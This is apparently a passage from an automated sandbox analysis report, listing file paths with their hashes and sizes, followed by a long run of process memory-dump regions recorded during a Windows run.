                                                                                                                        c5f5dd8c9d37d3db950d8045422444bc09cd0db0bd605ac52d23f6d351ab69278963f249b6d54fa9025b60964a23461cbaf8d13bf88023dd7351f8c01bf0e6d9

                                                                                                                      • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gaix9yhh.default-release\datareporting\glean\pending_pings\dcc718e8-91a2-4033-97df-093f7bab20bf

                                                                                                                        Filesize

                                                                                                                        734B

                                                                                                                        MD5

                                                                                                                        44e5c01eae8175d9a409d417899ca95a

                                                                                                                        SHA1

                                                                                                                        cb2b99bf88609154bddc1c826878fdd33842e2be

                                                                                                                        SHA256

                                                                                                                        768c9f763721032c61867034798a3fd92dbb230d25e832a10d9983893137adce

                                                                                                                        SHA512

                                                                                                                        7445ce0279e0b1ca62c446ecd97d1b466f749fb5eded2089040b0720848ddb366d94552ace04feb006dc10ade14bebde7c347a71908e6101f251f6f58210e812

                                                                                                                      • C:\Users\Admin\Desktop\Roblox Studio.lnk

                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        cad1b0a67e908c69fc8728c7e2dd2f03

                                                                                                                        SHA1

                                                                                                                        40acd8dcf1d3ae0ae7c579eee872d08581c67f4f

                                                                                                                        SHA256

                                                                                                                        d75736c99fa1ca9ed37cc737d65f8c5b444e020e2a9d178fef8df5b08f21b925

                                                                                                                        SHA512

                                                                                                                        ef896df2314d7e3586170eb89624cb5c0c7ee6fefd3e44dbcc7d3036a751803c0714ab71571792f7bce6589da667e1068b2331732144e2846a5050e144972180

                                                                                                                      • C:\Users\Admin\Downloads\Unconfirmed 848887.crdownload

                                                                                                                        Filesize

                                                                                                                        4.6MB

                                                                                                                        MD5

                                                                                                                        1b57a241eed58ce47249a846f2391652

                                                                                                                        SHA1

                                                                                                                        345999af03a6c515191d212a200fad24039100c1

                                                                                                                        SHA256

                                                                                                                        25913bcf70e0a8447e3ae39294cb3c3be44f15dcbccc4a0cd2aa4538e5ecc0f1

                                                                                                                        SHA512

                                                                                                                        870cc586696961c4de63643f264514140357cad1c9a4eaf9f1e631507c680359cdc760728afd46f6511155dc5c37b7c61dcd6825b185635aa0353fb18313a8c0

                                                                                                                      • \??\pipe\LOCAL\crashpad_644_PKCDUMANWMDDQEWE

                                                                                                                        MD5

                                                                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                                                                        SHA1

                                                                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                        SHA256

                                                                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                        SHA512

                                                                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                      • memory/1536-76-0x0000021E34370000-0x0000021E34390000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/1536-78-0x0000021E34780000-0x0000021E347A0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/1536-72-0x0000021E343B0000-0x0000021E343D0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/1556-17-0x0000000003770000-0x0000000003771000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2372-24-0x000001A3FB5C0000-0x000001A3FB5E0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/2372-27-0x000001A3FB580000-0x000001A3FB5A0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/2372-30-0x000001A3FB990000-0x000001A3FB9B0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/2400-7-0x00007FFD928E0000-0x00007FFD933A1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        10.8MB

                                                                                                                      • memory/2400-0-0x000002139E540000-0x000002139E56E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        184KB

                                                                                                                      • memory/2400-2-0x00007FFD928E0000-0x00007FFD933A1000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        10.8MB

                                                                                                                      • memory/2428-99-0x0000026A11310000-0x0000026A11330000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/2428-95-0x0000026A10F00000-0x0000026A10F20000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/2428-93-0x0000026A10F40000-0x0000026A10F60000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/2764-47-0x000001C85FB40000-0x000001C85FB60000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/2764-49-0x000001C85FB00000-0x000001C85FB20000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/2764-51-0x000001C85FF10000-0x000001C85FF30000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/3264-2563-0x00000206ABA10000-0x00000206ABA11000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/3368-129-0x0000000005370000-0x0000000005380000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/3368-4-0x0000000005080000-0x0000000005112000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        584KB

                                                                                                                      • memory/3368-128-0x00000000752C0000-0x0000000075A70000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/3368-3-0x00000000752C0000-0x0000000075A70000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        7.7MB

                                                                                                                      • memory/3368-1-0x0000000000400000-0x0000000000418000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        96KB

                                                                                                                      • memory/3368-5-0x0000000005120000-0x00000000051BC000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        624KB

                                                                                                                      • memory/3368-6-0x0000000005370000-0x0000000005380000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/3368-12-0x0000000006130000-0x0000000006180000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        320KB

                                                                                                                      • memory/3368-8-0x0000000005930000-0x0000000005ED4000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        5.6MB

                                                                                                                      • memory/3368-9-0x0000000005870000-0x00000000058D6000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        408KB

                                                                                                                      • memory/4268-116-0x0000018846C00000-0x0000018846C20000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/4268-114-0x0000018846C40000-0x0000018846C60000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/4268-119-0x0000018847000000-0x0000018847020000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        128KB

                                                                                                                      • memory/4660-2368-0x000001DC89B70000-0x000001DC89B71000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5196-2286-0x00007FFDAE8C0000-0x00007FFDAE8CB000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        44KB

                                                                                                                      • memory/5196-2289-0x00007FFDAE8C0000-0x00007FFDAE8CB000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        44KB

                                                                                                                      • memory/5196-2288-0x00007FFDAE8C0000-0x00007FFDAE8CB000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        44KB

                                                                                                                      • memory/5196-2290-0x00007FFDAE8C0000-0x00007FFDAE8CB000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        44KB

                                                                                                                      • memory/5196-2287-0x00007FFDAE8C0000-0x00007FFDAE8CB000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        44KB

                                                                                                                      • memory/5196-2292-0x00007FFDAE3F0000-0x00007FFDAE400000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2293-0x00007FFDAE4F0000-0x00007FFDAE500000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2294-0x00007FFDAE4F0000-0x00007FFDAE500000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2291-0x00007FFDAE3F0000-0x00007FFDAE400000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2295-0x00007FFDAE520000-0x00007FFDAE546000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        152KB

                                                                                                                      • memory/5196-2285-0x00007FFDAE8A0000-0x00007FFDAE8B0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2284-0x00007FFDAE8A0000-0x00007FFDAE8B0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2283-0x00007FFDAE980000-0x00007FFDAE98E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        56KB

                                                                                                                      • memory/5196-2282-0x00007FFDAE980000-0x00007FFDAE98E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        56KB

                                                                                                                      • memory/5196-2281-0x00007FFDAE980000-0x00007FFDAE98E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        56KB

                                                                                                                      • memory/5196-2280-0x00007FFDAE980000-0x00007FFDAE98E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        56KB

                                                                                                                      • memory/5196-2364-0x00007FFDB0820000-0x00007FFDB0821000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5196-2279-0x00007FFDAE980000-0x00007FFDAE98E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        56KB

                                                                                                                      • memory/5196-2278-0x00007FFDAE8D0000-0x00007FFDAE8E0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2277-0x00007FFDAE8D0000-0x00007FFDAE8E0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2275-0x00007FFDAE1D0000-0x00007FFDAE200000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        192KB

                                                                                                                      • memory/5196-2276-0x00007FFDAE1D0000-0x00007FFDAE200000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        192KB

                                                                                                                      • memory/5196-2270-0x00007FFDAE060000-0x00007FFDAE070000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2274-0x00007FFDAE1D0000-0x00007FFDAE200000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        192KB

                                                                                                                      • memory/5196-2273-0x00007FFDAE1D0000-0x00007FFDAE200000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        192KB

                                                                                                                      • memory/5196-2272-0x00007FFDAE1D0000-0x00007FFDAE200000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        192KB

                                                                                                                      • memory/5196-2271-0x00007FFDAE060000-0x00007FFDAE070000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2269-0x00007FFDADF50000-0x00007FFDADF60000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2268-0x00007FFDADF50000-0x00007FFDADF60000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2267-0x00007FFDB0820000-0x00007FFDB0821000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/5196-2266-0x00007FFDAF2B0000-0x00007FFDAF2C0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2258-0x00007FFDAF200000-0x00007FFDAF210000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2259-0x00007FFDAF200000-0x00007FFDAF210000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2260-0x00007FFDAF290000-0x00007FFDAF2A0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2261-0x00007FFDAF290000-0x00007FFDAF2A0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2262-0x00007FFDAF2B0000-0x00007FFDAF2C0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2263-0x00007FFDAF2B0000-0x00007FFDAF2C0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2264-0x00007FFDAF2B0000-0x00007FFDAF2C0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2265-0x00007FFDAF2B0000-0x00007FFDAF2C0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2257-0x00007FFDB0A20000-0x00007FFDB0A25000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        20KB

                                                                                                                      • memory/5196-2256-0x00007FFDB0990000-0x00007FFDB09C0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        192KB

                                                                                                                      • memory/5196-2252-0x00007FFDB0990000-0x00007FFDB09C0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        192KB

                                                                                                                      • memory/5196-2255-0x00007FFDB0990000-0x00007FFDB09C0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        192KB

                                                                                                                      • memory/5196-2254-0x00007FFDB0990000-0x00007FFDB09C0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        192KB

                                                                                                                      • memory/5196-2253-0x00007FFDB0990000-0x00007FFDB09C0000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        192KB

                                                                                                                      • memory/5196-2248-0x00007FFDB0830000-0x00007FFDB0840000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2251-0x00007FFDB0940000-0x00007FFDB0950000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2250-0x00007FFDB0940000-0x00007FFDB0950000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2249-0x00007FFDB0830000-0x00007FFDB0840000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/5196-2247-0x000001EE1FA20000-0x000001EE1FA21000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB